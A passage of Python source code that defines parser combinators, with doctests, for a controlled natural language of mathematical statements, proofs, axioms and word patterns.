Etok(tdop_rel_prop,'x , y , z PRIM_BINARY_RELATION_OP u PRIM_BINARY_RELATION_OP x')
"""
def f(acc):
(t,ls)=acc
#expand chain
op0 = [(a,r0,t0) for a in t[0::2] for (r0,t0) in ls[0:1]] #chain comma
op1 = [(a,r0,t0) for ((_,a),(r0,t0)) in zip(ls[:-1],ls[1:])]
return Etok(name='tdop_rel_prop',etoks=op0+op1,raw=acc)
return (c.plus_andcomma(tdop_term()) + (binary_relation_op() + tdop_term()).plus()).treat(f,'tdop_rel_prop')
@memo
def prop_op():
"""Parser for propositional connectives
>>> pstream(prop_op(),'PRIM_PROPOSITIONAL_OP')
Etok(prim_propositional_op,backdoor1,'PRIM_PROPOSITIONAL_OP')
"""
return first(
get_lookup_parse('prim_propositional_op') ,
cs_brace(get_lookup_parse('prim_propositional_op_controlseq'))
)
@memo
def tdop_prop():
"""Parser for operators among props, such
as and, or, implies.
precedence is negative.
It must be infix (possibly with multiple ops).
For example, a symbolic negation is not included.
subsumes binder_prop
output etoks: binder_props in even positions, ops in odd positions
>>> pstream(tdop_prop(),'BINDER_PROP PRIM_PROPOSITIONAL_OP BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP PRIM_PROPOSITIONAL_OP BINDER_PROP')
"""
def f(acc):
(b,m)=acc
return Etok(name='tdop_prop',etoks=[b]+lib.flatten(m),raw=acc)
return (get_lookup_parse('binder_prop') +
(prop_op().plus() + get_lookup_parse('binder_prop')).many()).treat(f,'tdop_prop')
@memo
def identifier_prop():
"""Parser for identifiers of type prop"""
return get_lookup_parse('prim_relation')
@memo
def annotated_prop():
"""Parser for prop, annotated as prop
>>> pstream(annotated_prop(),'(PROP : Prop)')
Etok(annotated_prop,'( PROP : prop )')
"""
def f(acc):
(_,((p,_),_),_) =acc
return Etok('annotated_prop',etoks=[p],raw=acc)
return c.paren(get_lookup_parse('prop')+colon + rawprop).treat(f,'annotated_prop')
@memo
def field_prop():
"""
Parser for prop obtained as dotted c.f, where the field f has type prop
Debug: should we add app_args (and move to app_args): c.f (x)?
"""
def f(acc):
return Etok(name='field_prop',etoks=acc,raw=acc)
return (tightest_term() + get_lookup_parse('prim_field_prop_accessor')).treat(f,'field_prop')
@memo
def prop_var():
"""parser for propositional var"""
def f(acc):
return Etok(name='prop_var',etoks=[acc],raw=acc)
return var().treat(f,'prop_var')
@memo
def tightest_prop():
"""Parser for tightly bound propositional statements"""
def f(acc):
(_,s,_)=acc
return Etok.rawupdate(s,acc)
return first(c.paren(get_lookup_parse('statement')).treat(f) ,
identifier_prop() ,
prop_var() ,
annotated_prop() ,
field_prop()
)
@memo
def app_prop():
"""parser for predicate application"""
def f(acc):
return Etok(name='app_prop',etoks=acc,raw=acc)
return (tightest_prop() + app_args()).treat(f,'any_prop')
@memo
def lambda_predicate():
"""parser for lambda term with values in prop
>>> pstream(lambda_predicate(),'fun TIGHTEST_EXPR : Prop := (STATEMENT)')
Etok(lambda_predicate,'fun TIGHTEST_EXPR : prop := ( STATEMENT )')
"""
def f(acc):
#return acc
(((((_,t),_),_),_),p)=acc
return Etok(name='lambda_predicate',etoks=(t,p),raw=acc)
return (next_word('fun')+ tightest_args() + colon + rawprop +
c.next_type('ASSIGN') + tightest_prop()
).treat(f,'lambda_predicate')
@memo
def binder_prop():
"""Recursive parser for props with (optional) binders (universal, etc.)
Subsumes various other kinds of props.
>>> pstream(binder_prop(),'PRIM_BINDER_PROP TIGHTEST_EXPR , A')
Etok(binder_prop,'PRIM_BINDER_PROP TIGHTEST_EXPR , A')
"""
def f(acc):
(((b,a),_),b2)=acc
return Etok(name='binder_prop',etoks=(b,a,b2),raw=acc)
return first(app_prop() ,
tdop_rel_prop() ,
lambda_predicate() ,
( get_lookup_parse('prim_binder_prop') +
args_template() + binder_comma() +
c.lazy_call(binder_prop)
).treat(f,'binder_prop')
)
@memo
def prop():
"""Parser for prop.
This is one of the main nonterminals.
It subsumes all specialized prop nonterminals.
The classifier is a sort of meta sort, which is currently ignored.
It might be a word such as 'predicate'
>>> pstream(prop(),'BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP')
"""
def f(acc):
(_,t)=acc
return t
return (get_lookup_parse('prim_classifier').possibly() + tdop_prop()).treat(f,'prop')
# install binder_prop,prop
# statements...
@memo
def possessed_noun():
return (attribute(get_lookup_parse('prim_possessed_noun')))
@memo
def has_pred():
"""Parser for has_pred or its negation.
Note that commas may appear in both attributes
and the list of has_pred, but the parse should be unambiguous
because of the articles.
>>> pstream(has_pred(),'the PRIM_POSSESSED_NOUN and the PRIM_POSSESSED_NOUN')
Etok(has_pred,'the PRIM_POSSESSED_NOUN and the PRIM_POSSESSED_NOUN')
"""
def f1(acc):
t = [p for (_,p) in acc[0::2]] # drop commas, articles
return Etok(name='has_pred',etoks=t,raw=acc)
def f2(acc):
return Etok(name='no_has_pred',etoks=acc,raw=acc)
return first(c.plus_andcomma(lit('article') + possessed_noun()).treat(f1,'has_pred') ,
(next_word('no') + possessed_noun()).treat(f2,'has_no_pred')
)
enot = next_word('not').treat(Etok.etok,'not')
@memo
def is_aPred():
"""Parser for nominal predicates
>>> pstream(is_aPred(),'not a TIGHTEST_TYPE')
Etok(indefinite_pred,'not a TIGHTEST_TYPE')
"""
def f1(acc):
((n,_),g)=acc
return Etok(name='indefinite_pred',etoks=(n,g),raw=acc)
def f2(acc):
return Etok(name='definite_pred',etoks=acc,raw=acc)
return first((enot.possibly() + lit('a').possibly() + general_type()).treat(f1,'indefinite_pred') ,
(enot.possibly() + definite_term()).treat(f2,'definite_pred')
)
@memo
def is_pred():
"""Parser for adjectival predicates
>>> pstream(is_pred(),'not PRIM_ADJECTIVE')
Etok(is_adjective,'not PRIM_ADJECTIVE')
>>> pstream(is_pred(),'not pairwise PRIM_ADJECTIVE_MULTISUBJECT')
Etok(is_adjective_multisubject,'not pairwise PRIM_ADJECTIVE_MULTISUBJECT')
>>> pstream(is_pred(),'having the PRIM_POSSESSED_NOUN')
Etok(is_with,'having the PRIM_POSSESSED_NOUN')
"""
def f1(acc):
return Etok(name='is_adjective',etoks=acc,raw=acc)
def f2(acc):
((n,p),m)=acc
return Etok(name='is_adjective_multisubject',etoks=(n,p,m),raw=acc)
def f3(acc):
return Etok(name='is_with',etoks=acc[1:],raw=acc) ##
return first(
(enot.possibly() + get_lookup_parse('prim_adjective')).treat(f1,'is_adjective') ,
(enot.possibly() + next_word('pairwise').treat(Etok.etok).possibly() + get_lookup_parse('prim_adjective_multisubject')).treat(f2,'is_adjective_multisubject') ,
(lit('with') + has_pred()).treat(f3,'is_with')
)
@memo
def does_pred():
"""Parser for verbal predicates.
Umbrella for various verbal, adjectival, nominal predicates.
"""
def f1(acc):
((_,n),v)=acc
return Etok(name='do_verb',etoks=(n,v),raw=acc)
def f2(acc):
((_,n),v)=acc
return Etok(name='do_verb_multisubject',etoks=(n,v),raw=acc)
def f3(acc):
(_,h)=acc
return Etok(name='do_has_pred',etoks=[h],raw=acc)
def f4(acc):
(_,ps)=acc
return Etok(name='does_is_adj',etoks=ps,raw=acc)
def f5(acc):
(_,ps)=acc
return Etok(name='is_nominal',etoks=ps,raw=acc)
return first(
(lit('do').possibly() + enot.possibly() + get_lookup_parse('prim_verb')).treat(f1,'do_verb') ,
(lit('do').possibly() + enot.possibly() + get_lookup_parse('prim_verb_multisubject')).treat(f2,'do_verb_multisubject') ,
(lit('has') + has_pred()).treat(f3,'do_has_pred') ,
(lit('is') + c.plus_andcomma(is_pred())).treat(f4,'does_is_adj') ,
(lit('is') + c.plus_andcomma(is_aPred())).treat(f5,'is_nominal')
)
# pseudoterms here
@memo
def plain_pred_pseudoterm():
"""Parser for a pseudoterm.
A pseudoterm is not a term in the grammar.
It is a term-like entity that can be
quantified over by extracting the
free variables from the pseudoterm and
quantifying over them.
For example, 'for all x,y < 5'.
The output is checked to be plain.
>>> pstream(plain_pred_pseudoterm(),'x, y = u, holding x')
Etok(plain_pred_pseudoterm,'x , y = u , holding x')
"""
def f(acc):
(_,t,_)=acc
return Etok(name='plain_pred_pseudoterm',etoks=t,raw=acc)
return c.opt_paren(tdop_rel_prop() + holding_vars().possibly()).if_test(isplains).treat(f,'plain_pred_pseudo_term')
#def predicate_pseudoterm():
# """Parse a plain_pred_pseudoterm with attribute"""
# return attribute(plain_pred_pseudoterm())
#def attribute_pseudoterm():
# """Parser for a pseudoterm with attribute"""
# return attribute(pseudoterm_without_attribute())
@memo
def pseudoterm_without_attribute():
"""Recursive parser for various pseudoterms
>>> pstream(pseudoterm_without_attribute(),'x of type TIGHTEST_TYPE')
Etok(annotated,'x of type TIGHTEST_TYPE')
>>> pstream(attribute(pseudoterm_without_attribute()),'x')
Etok(attribute,'x')
"""
def f2(acc):
(_,t)=acc
return Etok.rawupdate(t,acc)
def f3(acc):
((v,_),ann)=acc
return Etok('annotated',etoks=(v,ann),raw=acc)
def f5(acc):
(_,ps,_)=acc
return Etok.rawupdate(ps,acc)
return first(get_lookup_parse('prim_typed_name') ,
(get_lookup_parse('prim_classifier') + tvar()).treat(f2,'pseudoterm-2') ,
(var() + (lit('with') + next_word('type')) + opentail_type()).treat(f3,'pseudoterm-3') ,
tvar() , #after: var with...
c.paren(c.lazy_call(pseudoterm_without_attribute)).treat(f5,'pseudoterm-5')
)
@memo
def pseudoterm():
"""
Parser for pseudoterm.
This is the principal nonterminal for pseudoterm,
subsuming others.
"""
def f(acc):
return Etok(name='pseudoterm',etoks=acc,raw=acc)
return first(attribute(pseudoterm_without_attribute()) ,
attribute(plain_pred_pseudoterm()) ).treat(f,'pseudoterm')
# statements
comma_and = comma + next_word('and')
comma_or = comma + next_word('or')
filler = phrase_list_filler().possibly()
@memo
def simple_statement():
"""Parser for simple statement"""
def f(acc):
return Etok(name='simple_statement',etoks=acc,raw=acc)
return terms() + does_pred().plus(next_word('and'))
@memo
def there_is_statement():
"""Parser for pseudoterm existence"""
def f(acc):
(((_,_),n),p)=acc
return Etok(name='there_is_statement',etoks=(n,p),raw=acc)
return (next_word('there')+lit('exist')+next_word('no').possibly()+pseudoterm()).treat(f,'there_is_statement')
@memo
def const_statement():
def f(acc):
return Etok(name='const_statement',etoks=acc,raw=acc)
return first((next_word('the').possibly() + next_word('thesis')) ,
(lit('article').possibly() + lit('contradiction')))
@memo
def symbol_statement():
"""Recursive parser for first-order-logic like statements
Debug: should parse blocks of binders in single pass.
>>> pstream(symbol_statement(),'BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP')
>>> pstream(symbol_statement(),'BINDER_PROP')
Etok(tdop_prop,'BINDER_PROP')
>>> pstream(symbol_statement(),'forall x, BINDER_PROP')
Etok(forall_symbol_statement,'forall x , BINDER_PROP')
"""
def f_forall(acc):
(((_,a),_),s)=acc
return Etok(name='forall_symbol_statement',etoks=(a,s),raw=acc)
def f_exist(acc):
(((_,a),_),s)=acc
return Etok(name='exist_symbol_statement',etoks=(a,s),raw=acc)
def f_not(acc):
return Etok(name='not_symbol_statement',etoks=acc[1],raw=acc)
def f(acc):
(_,s,_)=acc
return Etok.rawupdate(s,acc)
return first(
prop() ,
(lit('forall') + pseudoterm() + binder_comma() + c.lazy_call(symbol_statement)).treat(f_forall,'forall_statement') ,
(lit('exist') + pseudoterm() + binder_comma() + c.lazy_call(symbol_statement)).treat(f_exist,'exist') ,
(next_word('not') + c.lazy_call(symbol_statement)).treat(f_not,'not') ,
(c.paren(c.lazy_call(symbol_statement))).treat(f,'symbol_statement')
)
@memo
def primary_statement():
"""Parser for primary statement"""
return first(
simple_statement() ,
there_is_statement() ,
(filler + const_statement()).treat(lib.snd) ,
(filler + symbol_statement()).treat(lib.snd)
)
@memo
def head_primary():
return first(get_lookup_parse('head_statement') ,
primary_statement())
@memo
def or_chain():
"""Parser for chain of or statements"""
def f(acc):
((p,_),h)=acc
return Etok(name='or_chain',etoks=p[0::2]+[h],raw=acc)
return (primary_statement().plus(comma_or) + comma_or + head_primary()).treat(f,'or_chain')
@memo
def and_chain():
"""Parser for chain of and statements"""
def f(acc):
((p,_),h)=acc
return Etok(name='and_chain',etoks=p[0::2]+[h],raw=acc)
return (primary_statement().plus(comma_and) + comma_and + head_primary()).treat(f,'and_chain')
@memo
def andor_chain():
"""Parser for chain of and/or statements"""
return first(and_chain() , or_chain() , primary_statement()
).name('andor_statement')
@memo
def chain_statement():
"""Parser for chain of and/or/iff statements"""
def f(acc):
(((_,ao,_),_),s)=acc
return Etok('iff_statement',etoks=(ao,s),raw=acc)
return first(andor_chain () ,
(c.paren(andor_chain()) + lit('iff') + get_lookup_parse('statement')).treat(f,'iff_statement')
).name('chain_statement')
@memo
def head_statement():
"""Parser for if/then, negation, for ..., statements
We distinguish between if-then statements and if-then terms.
"""
def f_for(acc):
(((_,p),_),s)=acc
return Etok(name='for_statement',etoks=(p,s),raw=acc)
def f_ifthen(acc):
((((_,s),_),_),s2)=acc
return Etok(name='if_then_statement',etoks=(s,s2),raw=acc)
def f_wrong(acc):
return Etok(name='wrong_statement',etoks=acc[1:],raw=acc)
return first(
# DEBUG: use quasiterm instead of any_name?
(next_word('for') + c.plus_andcomma(any_name()) + binder_comma() + get_lookup_parse('statement')).treat(f_for,'for_statement') ,
(next_word('if')+ get_lookup_parse('statement') + comma + next_word('then') + get_lookup_parse('statement')).treat(f_ifthen,'if_then_statement') ,
(lit('wrong') + get_lookup_parse('statement')).treat(f_wrong,'wrong_statement')
).name('head_statement')
@memo
def statement():
"""Parser for statement.
This subsumes other specialized statements."""
return first(head_statement() , chain_statement()).name('statement')
# next texts
@memo
def namespace():
"""Not implemented. Always fails."""
return Parse.fail()
@memo
def synonym_item():
"""Parser for synonym item as text item
>>> pstream(synonym_item(),'we introduce synonyms rough/-en, tilde/ tildilla.')
Etok(instruction,synonym,'we introduce synonym rough /- en , tilde / tildilla .')
"""
pre = next_word('we').possibly() + next_word('introduce').possibly() + next_word('synonyms')
def f(acc):
((_,b),_)=acc
b1 = c.retreat_list(Instruction.syn(),[b])
return Etok.rawupdate(b1[0],acc)
return (pre + c.balanced_condition(not_period) + period).commit(pre).treat(f)
@memo
def inductive_decl():
"""Parser for declaration of induction types.
It terminates with 'end' keyword.
Identifier must be located internally because of recursion.
>>> pstream(inductive_decl(),'inductive integer | id : POST_COLON_TYPE end')
Etok(inductive_decl,'inductive integer | id : POST_COLON_TYPE end')
"""
def f(acc):
(((((_,i),a),s),c1),_)=acc
#print(f'c1={c1}')
c1 = c.retreat_list(_opt_alt_constructor().many(),[lib.fflatten(c1)])
return Etok(name='inductive_decl',etoks=(i,a,s,c1),raw=acc)
return (c.next_word('inductive') + identifier() + args_template() + opt_colon_sort() +
c.balanced_condition(not_end) + c.next_word('end')).treat(f,'inductive_decl')
@memo
def mutual_inductive_decl_item():
"""DEBUG: not tested"""
pre = lit('declare_mutual_inductive_decl')
def f(acc):
(((_,w),pa),_)=acc
if pa:
pa = pa[1]
return Etok('mutual_inductive_decl_item',etoks=(w[0::2],pa),raw=acc)
return (pre + c.plus_comma(atomic()) +
(lit('param') + args_template()).possibly() + period
).commit(pre).treat(f,'mutual_inductive_decl_item')
@memo
def mutual_inductive_def_item():
"""DEBUG: not tested"""
pre = lit('declare_mutual_inductive_def')
def f(acc):
(((_,w),pa),_)=acc
if pa:
pa = pa[1]
return Etok('mutual_inductive_def_item',etoks=(w[0::2],pa),raw=acc)
return (pre + c.plus_comma(atomic()) +
(lit('param') + args_template()).possibly() + period
).commit(pre).treat(f,'mutual_inductive_def_item')
def moreover_implements_deprecated():
"""DEBUG: not tested.
Deprecated. Add predicate satisfaction instead.
Parser for an item that extends a structure or
inductive type with """
def f(acc):
(((((_,_),g),_),b),_)=acc
b = c.reparse_list(field(),b[0::2])
return (g,b)
return (next_word('moreover') + comma + general_type() +
lit('implement') + c.brace_semif() +
period).treat(f,'moreover_implements')
def this_exists_deprecated():
"""parsing of 'this'-directives.
DEBUG: Remove this feature. Deprecated Unfinished.
"""
def adjective(tok):
s1 = tok.value.lower.replace('_','')
return s1 in ['unique','canonical','welldefined','wellpropped','total','exhaustive']
def this_directive_right_attr():
return next_phrase('by recursion')
def this_directive_pred():
# debug, need to slice [0::2]
return c.plus_andcomma(Parse.next_token().if_test(adjective))
return first_phrase(['this exist','this is'])
@memo
def satisfy_item():
"""
Parser for item that extends a given type with
a unique existence statement, used in satisfaction-style
structural typing of structures.
This is used to define coercions say from a
metric space to topological space.
The statement should be exists unique.
DEBUG: A pseudoterm might be too general.
We want expressions like (G:group) or group G ...
>>> pstream(satisfy_item(),'Every (G: POST_COLON_TYPE) satisfies BINDER_PROP.')
Etok(satisfy_item,'every ( G : POST_COLON_TYPE ) satisfy BINDER_PROP .')
"""
def f(acc):
(((p,f),s),_)=acc
if f:
(_,f,_)=f
return Etok('satisfy_item',etoks=(p,f,s),raw=acc)
pre = next_word('every') + pseudoterm() +lit('satisfy')
return (pre + c.opt_paren(field_prefix()).possibly() + statement() + period).commit(pre,'satisfy_item').treat(f,'satisfy_item')
@memo
def then_prefix():
return lit('then').possibly()
# no memo, takes an argument
def decl_label(s:str):
"""
Sample input for decl_label('axiom')
Axiom.
Conjecture Riemann.
Sample input for decl_label('theorem')
Theorem Pappus.
>>> pstream(decl_label('axiom'),'Equation 90.')
Etok(decl_label,'equation 90 .')
"""
def f(acc):
((a,l),_)=acc
return Etok(name='decl_label',etoks=(a,l),raw=acc)
return (lit(s)+label().possibly() + period).treat(f)
@memo
def let_annotation_prefix():
"""Parser for initial segment of a let statement.
>>> pstream(let_annotation_prefix(),'let u,v,w be fixed ...')
Etok(let_annotation_prefix,'let u , v , w be fixed')
"""
def f(acc):
((((l,vs),_),_),f)=acc
if f:
l=f
vs = vs[0::2]
return Etok(name='let_annotation_prefix',etoks=(Etok.etok(l),vs),raw=acc)
return (next_word('let') + c.plus_comma(var()) +
next_word('be') + lit('a').possibly() +
next_word('fixed').possibly()).treat(f)
@memo
def let_annotation():
"""Parser for let_annotations. Terminating punctuation not included.
Sample parser inputs:
Let G be a group
Let G be a fixed group
Let (H G : group)
Fix (x : R)
"""
def f1(acc):
return Etok(name='let_annotation',etoks=acc,raw=acc,rule='1')
def f2(acc):
return Etok(name='let_annotation',etoks=acc,raw=acc,rule='2')
def f3(acc):
return Etok(name='let_annotation',etoks=acc,raw=acc,rule='3')
return first(
(first_word( 'fix let') + annotated_vars()).treat(f1,'let_annotation1') ,
(let_annotation_prefix() + general_type()).treat(f2,'let_annotation2') ,
(let_annotation_prefix() + (rawtype|rawprop)).treat(f3,'let_annotation3')
)
@memo
def assumption_prefix():
"""Parser for prefix of assumption.
>>> pstream(assumption_prefix(),'We assume that')
((Etok(LIT,lets,'we'), Etok(LIT,assume,'assume')), LexToken(WORD,'that',1,10))
"""
def f(acc):
return Etok(name='assumption_prefix',etoks=[],raw=acc)
return (
lit('lets') + lit('assume') + next_word('that').possibly()
)
@memo
def assumption():
"""Parser for assumptions in theorems and axioms.
There are two varieties: 'We assume that' or type annotations.
>>> pstream(assumption(),'We assume that BINDER_PROP.')
Etok(assumption,'we assume that BINDER_PROP .')
"""
def f(acc):
((_,s),_)=acc
return Etok(name='assumption',etoks=[s],raw=acc)
def f2(acc):
(l,_)=acc
return Etok.rawupdate(l,acc)
pre = lit('lets') + lit('assume')
pre2 = first_word('let fix')
return first((assumption_prefix() + statement() + period).commit(pre).treat(f,'assumption') ,
(let_annotation() + period).commit(pre2).treat(f2,'assumption')
)
@memo
def axiom():
"""Parser for axioms and other statements without proof.
We need unambiguous lines between assumptions and claims.
'Then' and 'Moreover' always belong to claims.
Sentences starting with let, fix, assumption_prefix are assumptions.
>>> pstream(axiom(),'Conjecture. We assume that BINDER_PROP. Then BINDER_PROP.')
Etok(axiom,'conjecture . we assume that BINDER_PROP . then BINDER_PROP .')
"""
def f(acc):
(((((_,aa),_),s),_),ms) = acc
ms = [s for ((_,s),_) in ms]
return Etok(name='axiom',etoks=(aa,[s]+ms),raw=acc)
return (
decl_label('axiom') + assumption().many() +
then_prefix() + statement() + period +
(next_word('moreover') + statement() + period).many()
).treat(f,'axiom')
@memo
def theorem():
"""Parser for theorem and proof.
>>> pstream(theorem(),'Theorem 1. AFFIRM_PROOF')
Etok(theorem,'theorem 1 . AFFIRM_PROOF')
"""
def f(acc):
((_,aa),p)=acc
return Etok(name='theorem',etoks=(aa,p),raw=acc)
return (decl_label('theorem') + assumption().many() +
get_lookup_parse('affirm_proof')).treat(f,'theorem')
@memo
def nonkey(): #was not_banned
keyword = [
'is','be','are','denote','define','enter','namespace','stand',
'if','iff','inferring','the','a','an','we','say','write',
'assume','suppose','let','said','defined','or','fix','fixed'
]
def p(token):
return not(c.singularize(token.value) in keyword)
return c.next_type(['VAR','WORD','ATOMIC_IDENTIFIER']).if_test(p)
@memo
def any_controlseq(): #was controlseq
r"""
>>> pstream(any_controlseq(),r'\include')
Etok(CONTROLSEQ,\include,'\include')
"""
return c.next_type('CONTROLSEQ').treat(Etok.etok)
def controlseq(s): #was the_controlseq
"""Parser for a particular control sequence 's'.
s includes the backslash."""
return any_controlseq().if_value(s)
# PROOFS
class Proof_step:
"""Parser constructors for proof steps
Everything in this class is non-recursive in terms of
the lookup 'proof_script' 'affirm_proof'
"""
def kill(acc):
"""Currently proof statements are not being
saved into the AST. Parse then discard."""
return Etok(name='proof-step',etoks=[],raw=acc)
def canned_prefix():
"""
>>> pstream(Proof_step.canned_prefix(),'Of course, it is trivial to see,')
Etok(proof-step,'of course , it is trivial to see ,')
"""
# debug need slice [0::2]
return (c.plus_andcomma(phrase_list_transition()) +
comma.possibly()
).treat(Proof_step.kill,'canned_prefix')
def canned():
"""parser for canned proof statements
>>> pstream(Proof_step.canned(),'The proof is routine')
Etok(proof-step,'the proof is routine')
>>> pstream(Proof_step.canned(),'The corollary follows')
Etok(proof-step,'the corollary follow')
"""
return first(next_phrase("we proceed as follows") ,
(next_word('the') +
first_word('result lemma theorem proposition corollary') +
next_word('now').possibly() +
next_word('follows')) ,
next_phrase('the other cases are similar') ,
(next_phrase('the proof is')+ first_word('obvious trivial easy routine'))).treat(Proof_step.kill,'canned')
def ref_item():
"""
>>> pstream(Proof_step.ref_item(),'theorem 33')
Etok(proof-step,'theorem 33')
"""
return c.plus_andcomma(read_keyword('location').possibly() + atomic()).treat(Proof_step.kill,'ref_item')
def by_ref():
"""
>>> pstream(Proof_step.by_ref(),'(by Theorem 1)')
Etok(proof-step,'( by theorem 1 )')
"""
return c.paren(next_word('by') + Proof_step.ref_item()).possibly().treat(Proof_step.kill,'by_ref')
def by_method():
"""
menhir/ocaml doc describes an ambiguity here.
I'm hoping it goes away now that plain_term is implemented.'
>>> pstream(Proof_step.by_method(),'by induction on TDOP_TERM. ')
Etok(proof-step,'by induction on TDOP_TERM')
"""
return (next_word('by') +
(first_phrase(['contradiction','case analysis']) |
(next_word('induction') +
(next_word('on') + plain_term()).possibly()) +
(next_word('that')| period).probe()).name('post_by_method')
).treat(Proof_step.kill,'by_method')
def choose_prefix():
"""
>>> pstream(Proof_step.choose_prefix(),'We choose')
Etok(proof-step,'we choose')
"""
return (then_prefix() + lit('lets').possibly() + lit('choose')).treat(Proof_step.kill,'choose_prefix')
def opt_proof():
return get_lookup_parse('proof_script').possibly().treat(Proof_step.kill,'opt_proof')
def choose():
"""
>>> pstream(Proof_step.choose(),'We choose x and y.')
Etok(proof-step,'we choose x and y .')
"""
return (Proof_step.choose_prefix() + c.plus_andcomma(pseudoterm()) +
Proof_step.by_ref() + period +
Proof_step.opt_proof()
).treat(Proof_step.kill,'choose')
def proof_preamble():
"""
>>> pstream(Proof_step.proof_preamble(),'Proof by contradiction.')
Etok(proof-step,'proof by contradiction .')
"""
return first(
(next_word('proof') + Proof_step.by_method().possibly() + period) ,
next_word('indeed')
).treat(Proof_step.kill,'proof_preamble')
def goal_prefix():
"""
>>> pstream(Proof_step.goal_prefix(),'We prove that ...')
Etok(proof-step,'we prove that')
"""
return first((lit('lets').possibly() + lit('prove') + next_word('that')) ,
(Proof_step.by_method() + next_word('that')).possibly()
).treat(Proof_step.kill,'goal_prefix')
def goal_proof():
"""
>>> pstream(Proof_step.goal_proof(),'We prove that it is wrong that STATEMENT (by theorem 3). proof_script ...')
Etok(proof-step,'we prove that it is wrong that STATEMENT ( by theorem 3 ) . proof_script')
"""
return (Proof_step.goal_prefix() + statement() + Proof_step.by_ref() + period +
get_lookup_parse('proof_script')
).treat(Proof_step.kill,'goal_proof')
def statement_proof():
return (then_prefix() + statement() + Proof_step.by_ref() + period +
(next_word('moreover') + statement() + Proof_step.by_ref() + period).many()
).treat(Proof_step.kill,'statement_proof')
def case():
"""
>>> pstream(Proof_step.case(),'Case it is wrong that STATEMENT.')
Etok(proof-step,'case it is wrong that STATEMENT .')
"""
return (next_word('case') + statement() + period + Proof_step.opt_proof()
).treat(Proof_step.kill,'case')
def proof_body():
"""Forthel prohibits the last proof-body in a proof
from being an assumption. We do not prohibit this.
"""
return first(
assumption() ,
Proof_step.canned() ,
Proof_step.case() ,
Proof_step.choose() ,
get_lookup_parse('affirm_proof')
).treat(Proof_step.kill,'proof_body')
@memo
def affirm_proof():
return first(c.lazy_call(Proof_step.statement_proof) ,
c.lazy_call(Proof_step.goal_proof))
@memo
def proof_script():
return (Proof_step.proof_preamble() +
c.lazy_call(Proof_step.proof_body).plus() +
lit('qed') + period
)
# patterns
pattern_key = ["is","be","are","denote","define"
"enter","namespace",
"stand","if","iff","inferring","the","a","an",
"we","say","write",
"assume","suppose","let",
"said","defined","or","fix","fixed" # and (need in 'resultant of f and g')
]
class Pattern:
"""Parser generators for patterns"""
def word_nonkey():
"""Parser for any WORD token except for keywords."""
return c.next_any_word_except(pattern_key).treat(Etok.etok).name('word_nonkey')
def word_extended():
"""parser for 'word (or word) (word pattern)'.
words cannote be key words
(or word) gives a synonym as a parenthetical.
(word pattern) is an optional recursive word pattern.
>>> pstream(Pattern.word_extended(),'unsupported (or empty) (WORD_PATTERN)')
Etok(word_extended,'unsupported ( or empty ) ( WORD_PATTERN )')
"""
def f(acc):
((w,o),wp)=acc
if o:
(_,(_,o),_)=o
wp = (w for (_,w,_) in wp)
return Etok('word_extended',etoks=(w,wp,o),raw=acc)
return (Pattern.word_nonkey() +
c.paren(next_word('or') + Pattern.word_nonkey()).possibly() +
c.paren(get_lookup_parse('word_pattern')).many()
).treat(f,'word_extended')
def words_extended():
return Pattern.word_extended().plus()
def _var():
"""parser for a variable appearing in a pattern
>>> pstream(Pattern._var(),'x')
Etok(VAR,x,'x')
"""
return var() | annotated_var()
def word_pattern():
"""Parser for an (extended) word pattern,
starting with an (extended) word.
Extended words appear in even positions and
variables appear in odd positions.
>>> pstream(Pattern.word_pattern(),'integrable with respect to x')
Etok(word_pattern,'integrable with respect to x')
"""
def f(acc):
((w,vws),v)=acc
vws = [w]+vws
if v:
vws = lib.fflatten(vws + [v])
return Etok('word_pattern',etoks=vws,raw=acc)
return (Pattern.words_extended() +
(Pattern._var() + Pattern.words_extended()).many() +
Pattern._var().possibly()).treat(f,'word_pattern')
def type_word_pattern():
def f(acc):
(_,wp)=acc
return wp
return (lit('a').possibly() + Pattern.word_pattern()).treat(f,'type_word_pattern')
def function_word_pattern():
def f(acc):
(_,wp)=acc
return wp
return (next_word('the') + Pattern.word_pattern()).treat(f,'function_word_pattern')
def notion_pattern():
def f(acc):
(((v,_),_),wp)=acc
return Etok('notion_pattern',etoks=(v,wp),raw=acc)
return (Pattern._var() + next_word('is') + lit('a') +
Pattern.word_pattern()
).treat(f,'notion_pattern')
def adjective_pattern():
"""
profile ('adjective_pattern' ('var','word_pattern'))
"""
def f(acc):
(((v,_),_),wp)=acc
return Etok('adjective_pattern',etoks=(v,wp),raw=acc)
return (Pattern._var() + next_word('is') +
next_word('called').possibly() +
Pattern.word_pattern()
).treat(f,'adjective_pattern')
def var_multisubsect_pattern():
"""
Debug: The variables in a multisubject must have the same type.
"""
def f1(acc):
((v1,_),v2)=acc
return Etok(name='var_multisubject_pattern',etoks=(v1,v2,None),raw=acc)
def f2(acc):
(_,(((v1,_),v2),o),_)=acc
return Etok(name='var_multisubject_pattern',etoks=(v1,v2,o),raw=acc)
return first(
(Pattern._var() + comma +
Pattern._var()).treat(f1,'var_multisubject_pattern') ,
c.paren(Pattern._var() + comma + Pattern._var() +
opt_colon_type()).treat(f2,'var_multisubject_pattern')
)
def adjective_multisubject_pattern():
def f(acc):
(((v,_),_),w)=acc
return Etok('adjective_multisubject_pattern',etoks=(v,w),raw=acc)
return (
Pattern.var_multisubsect_pattern() + next_word('are') +
next_word('called').possibly() + Pattern.word_pattern()
).treat(f,'adjective_multisubject_pattern')
def verb_pattern():
def f(acc):
return Etok('verb_pattern',etoks=acc,raw=acc)
return (Pattern._var() + Pattern.word_pattern()).treat(f,'verb_pattern')
def verb_multisubject_pattern():
def f(acc):
return Etok('verb_multisubject_pattern',etoks=acc,raw=acc)
return (Pattern.var_multisubsect_pattern() +
Pattern.word_pattern()).treat(f,'verb_multisubject_pattern')
def predicate_word_pattern():
return first(
Pattern.notion_pattern() ,
Pattern.adjective_pattern() ,
Pattern.adjective_multisubject_pattern() ,
Pattern.verb_pattern() ,
Pattern.verb_multisubject_pattern()
).name('predicate_word_pattern')
def controlseq_pattern():
r"""
>>> pstream(Pattern.controlseq_pattern(),r'\tie {x} {y} [z]')
Etok(controlseq_pattern,'\tie { x } { y }')
"""
def f(acc):
(a,vs)=acc
vs = [v for (_,v,_) in vs]
return Etok('controlseq_pattern',etoks=(a,vs),raw=acc)
return (
any_controlseq() + c.brace(Pattern._var()).many()
).treat(f,'controlseq_pattern')
def binary_controlseq_pattern():
def f(acc):
((v,c),v2)=acc
return Etok('binary_controlseq_pattern',etoks=(v,c,v2),raw=acc)
